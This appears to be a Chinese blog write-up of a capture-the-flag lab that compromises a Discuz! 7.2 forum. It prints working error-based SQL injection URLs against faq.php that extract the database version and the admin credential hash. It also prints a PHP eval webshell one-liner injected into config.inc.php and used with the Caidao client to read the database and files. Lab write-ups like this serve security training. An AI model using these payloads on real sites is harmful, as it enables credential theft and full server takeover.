1. 程式人生 > >實驗吧_網站綜合滲透_Discuz!

實驗吧_網站綜合滲透_Discuz!

前言

這個一個實驗吧中的環境,分值為50分,下面是題目說明。誒,發現自己很菜。

你是國內一流安全公司的“安全專家”,你帶領的團隊負責維護國內某金融網站的安全,馬上臨近雙十一購物節,客戶要求你對重點保障網站進行“授權安全檢查”,希望你能找到網站的漏洞。 操作機器IP:192.168.1.2 目標機器IP:192.168.1.3

題目說明

1、 在不影響客戶業務的前提下,你對網站進行了“應用安全”掃描,你通過掃描發現網站存在SQL注入漏洞,你為了排除掃描器誤報的可能性,你需要進行手工驗證。 要求驗證SQL注入的過程: 1)注入過程中使用的黑客命令 2)成功登陸網站後臺的管理介面 完成以上步驟後,找到key1與kye2,可將key提交到平臺得分。

2、通過手工驗證,你證實了網站存在SQL注入漏洞,並能通過此漏洞獲取到網站的管理員賬號資訊,你為了讓客戶重視危害,在客戶授權的前提下進行了“上傳shell”的操作。 要求你通過網站漏洞,通過安全技術將“webshell”上傳到伺服器。 需要你完成: 1)通過漏洞上傳“webshell”。 完成以上步驟後,找到key4與key5,可將key提交到平臺得分。

3、你將你的發現報告給了客戶,客戶非常認同你的專業知識水平,希望你可以利用上面的發現進一步的對網站所處的伺服器進行安全測試,找到更多的漏洞。 需要你完成: 利用上面的成果對伺服器進行“提取”、“遠端連線”。 完全控制伺服器。 完成以上步驟後,找到key5,可將key5提交到平臺得分。

正文

首先訪問192.168.1.3,發現是一個基於Discuz!7.2的論壇網站。 首頁 通過百度等搜尋引擎搜尋這個版本的通用漏洞,發現存在一個sql注入漏洞,以下是payload。

http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 

然後利用這個payload驗證目標網站是否已經修補這個漏洞。 爆資料庫版本號:

192.168.1.3/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

在這裡插入圖片描述 緊接著就是爆資料庫管理員的使用者名稱和密碼

192.168.1.3/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select concat(username,0x7e7e,password,0x7e7e) from cdb_members limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

在這裡插入圖片描述 其中的密碼的hash可以通過下面的操作轉明文,得到密碼simple123.接著去找登入的後臺介面登入。 在這裡插入圖片描述 第一個key1在管理中心–>站點資訊–>全域性的這個框框中 在這裡插入圖片描述 進入後臺之後,接著就是找木馬上傳點。維持許可權啊喂。 通過原生代碼審計,發現這個地方可上傳一句話。 在這裡插入圖片描述 一句話構造,記得密碼不帶引號,引號需要轉移,否則服務會死。

xx\');eval($_POST[jedi]);?>\\

在這裡插入圖片描述 提交儲存之後,使用菜刀連線,特別注意的是,連結的地址是xxxxx/config.inc.php 在這裡插入圖片描述 連線上了之後第一件事就是找配置檔案。記錄配置檔案的密碼和配置資訊。 在這裡插入圖片描述 發現數據庫配置,接著去連線資料庫,即可查詢另一個賬號的密碼,即key2

在這裡插入圖片描述 在這裡插入圖片描述 編輯後儲存,連線資料庫。發現三個加密後的密碼值。其中的第二個就是key2(需要獲取明文).

在這裡插入圖片描述 然後在資料庫中又發現了key3 在這裡插入圖片描述 然後在檔案管理中發現key4的壓縮包,首先是下載下來。發現解壓不了,然後注意到大小僅為80,所以直接使用sublime開啟。得到一串十六進位制的字串,使用hackbar先十六進位制再base64解碼即可。 在這裡插入圖片描述 最後在桌面中發現最後一共key5.這裡好像有點問題沒有題目要求的提權,webshell的許可權好像高了。

在這裡插入圖片描述

後言

首先這篇博文有一部分參考了別人的writeup,其次如果寫的有問題的可以留言。感謝實驗吧的提供的環境,但是也要吐槽一下,希望實驗吧新增一些功能,比如共享剪下板。